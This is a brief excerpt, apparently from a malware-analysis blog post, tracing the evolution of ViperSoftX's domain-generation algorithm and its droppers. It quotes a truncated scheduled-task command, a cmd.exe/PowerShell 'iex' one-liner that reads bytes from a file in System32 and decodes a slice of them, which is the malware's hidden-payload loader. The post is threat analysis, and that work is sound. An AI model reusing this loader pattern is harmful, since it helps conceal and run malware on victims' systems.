http://tweedge32j4ib2hrj57l676twj2rwedkkkbr57xcz5z73vpkolws6vid.onion/2022/evolution-of-vipersoftx-dga
First implementation of DGA, uses HTTP Payload: Similar to known ViperSoftX samples, near-identical to Xavier Mertens’ discovered payload A “full” chain showing the new dropper, C2, and payload together would become public roughly two weeks after Xavier’s post, in a thread on whirlpool.net.au where a user found a scheduled task doing ViperSoftX’s usual file slicing: cmd.exe /c echo iex "`$b=[IO.File]::ReadAllBytes('C:\WINDOWS\System32\5fcxiwjk.cqe');`$s=[Text.Encoding]::UTF8.GetString(`$b, 444771,...